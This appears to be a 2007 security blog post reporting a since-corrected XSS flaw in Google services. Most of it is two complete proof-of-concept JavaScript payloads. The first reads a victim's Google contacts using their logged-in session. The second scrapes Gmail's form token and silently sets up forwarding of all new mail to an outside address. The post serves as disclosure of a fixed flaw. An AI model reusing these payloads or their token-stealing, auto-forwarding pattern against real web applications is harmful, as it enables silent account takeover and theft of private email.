
 A new critical Google XSS vulnerability promptly corrected

Written by DP

Thursday, 27 September 2007

Check out the new Google XSS vulnerability that beford discovered. There are actually working exploits which allow attackers to steal information from Gmail accounts. These exploits have been successfully tested under all major browsers. Those of you who use Firefox + the NoScript plugin are fully protected against such attacks.



The following PoC JavaScript exploit by beford was injected via the vulnerable parameter to display the victim's contacts:


document.innerHTML = '';

/**
 * Load an XML document and hand the parsed DOM to a callback.
 *
 * Parameter names are Spanish: `fichero` is the URL/path to load and
 * `funcion` is the callback invoked with the loaded document.
 *
 * Two browser families are handled: DOMImplementation.createDocument
 * (Gecko-style) and the ActiveX "Microsoft.XMLDOM" object (IE). In any other
 * browser neither branch runs and `funcion` is never called.
 *
 * @param {string} fichero - URL of the XML resource to fetch.
 * @param {function(Document)} funcion - Called with the loaded XML document.
 */
function readXML(fichero, funcion) {
   var xmlDoc;
   // Feature detection rather than user-agent sniffing.
   var gecko = (typeof document.implementation != 'undefined')  && (typeof document.implementation.createDocument != 'undefined');
   var ie = (typeof window.ActiveXObject != 'undefined');

  if (gecko) {
    xmlDoc = document.implementation.createDocument("", "", null)
    // The onload handler is attached *after* load() is started; this relies
    // on the load completing asynchronously. Keep the statement order as is.
    xmlDoc.load(fichero);
    xmlDoc.onload = function() {  funcion(xmlDoc); }
  } else if (ie) {
    xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    // Synchronous load, so the document is (normally) complete on return;
    // the callback is only invoked when readyState reports completion (4).
    xmlDoc.async = false;
    xmlDoc.load(fichero);
    if (xmlDoc.readyState == 4) funcion(xmlDoc);
  }
}

/**
 * Write every `<Address>` element of the XML document into the page.
 *
 * Each entry is rendered as "index. value<br/>" via document.write. The
 * value is inserted unescaped, so it is interpreted as HTML markup.
 *
 * @param {Document} xmlDoc - Parsed XML document containing <Address> nodes.
 */
function writeList(xmlDoc)
{
    var cells = xmlDoc.getElementsByTagName("Address");
    for (var i = 0; i < cells.length; i++) {
    // `status` is not declared with `var`, so this assigns a global.
    // NOTE(review): in a browser the global `status` is window.status (the
    // status-bar text), which is presumably not intended — a local would do.
    status = cells[i].childNodes[0].nodeValue;
    document.write(i + '. ' +status + '<br/>');
    }
 
 
}

// Fetch the victim's contacts listing and print it with writeList.
// NOTE(review): this only works because the injected script runs in an
// origin from which this endpoint is readable (presumably the same origin),
// so the browser attaches the logged-in session and the same-origin policy
// does not block the read — the core reason an XSS in an authenticated
// web application is an information-disclosure issue.
readXML('http://groups.google.com/groups/profile/contacts?max=900', writeList);




The following PoC JavaScript exploit by beford was injected via the vulnerable parameter to forward all newly received e-mails to another e-mail account — no user interaction is needed, only that the victim is logged in to Gmail.



/**
 * Extract the text between the first `startsign` found at or after `pos`
 * and the next `endsign` that follows it.
 *
 * @param {string} str - Text to search.
 * @param {string} startsign - Opening delimiter (not included in the result).
 * @param {string} endsign - Closing delimiter (not included in the result).
 * @param {number} pos - Index at which to start looking for `startsign`.
 * @returns {string} The enclosed text, or '' if either delimiter is missing.
 */
function findOne(str, startsign, endsign, pos) {
    var openAt = str.indexOf(startsign, pos);
    if (openAt === -1) return '';
    var bodyStart = openAt + startsign.length;
    var closeAt = str.indexOf(endsign, bodyStart);
    return closeAt === -1 ? '' : str.substring(bodyStart, closeAt);
}


// Request the settings page of the basic-HTML interface. `Ajax.Request` is not
// defined on this page; presumably it is the Prototype.js helper already
// loaded by the application. Because the request is same-origin it is sent
// with the victim's session, which is why the page says no interaction is
// needed beyond being logged in.
new Ajax.Request('/mail/h/?v=prfap', {
    method: 'get',
    onSuccess: function(transport) {
        var page = transport.responseText;
        // `athash` is the value the settings form carries in its action URL —
        // presumably a per-session anti-forgery token. The injected script can
        // read it straight from the response, so a form token alone does not
        // mitigate XSS; only fixing the injection (output encoding / input
        // validation) does. Note: every assignment below lacks `var` and so
        // creates implicit globals.
        athash = findOne(page, '<form action="?at=', "\"\nname=f enctype=multipart/form-data method=POST",1);
        // Path segment taken from the logout link, reused to build the POST URL.
        kk=findOne(page,'<a href="http://mail.google.com/mail/h/', '/?logout', 1);
        // `fwdp`, `p_sx_at` and `p_ix_pd` are set here but the POST body below
        // hard-codes 'fwdp=1' and 'p_ix_pd=0' instead of reading them.
        fwdp=1;
        p_sx_em='fernando@beford.org';
        p_sx_at="";
        p_ix_pd="0";
        nvp_a_prefs="Save Changes";
        
        // Submit the forwarding preferences. The response handlers below do
        // nothing with the result (`page` and `ok` are unused, onComplete is
        // empty), so success is never verified.
        new Ajax.Request('/mail/h/'+kk+'/?at=' + athash, {
            method: 'post',

            parameters: 'fwdp=1' + '&p_sx_em=' + encodeURIComponent(p_sx_em) + '&p_sx_at=' + encodeURIComponent(p_sx_at) + '&p_ix_pd=0&nvp_a_prefs=' + encodeURIComponent(nvp_a_prefs),
            onSuccess: function(transport) {
                var page = transport.responseText;
                var ok = 0;
            },
            onComplete: function(transport) {
                
            }
        });            
    }
});



Google appears to have promptly corrected the vulnerability.


        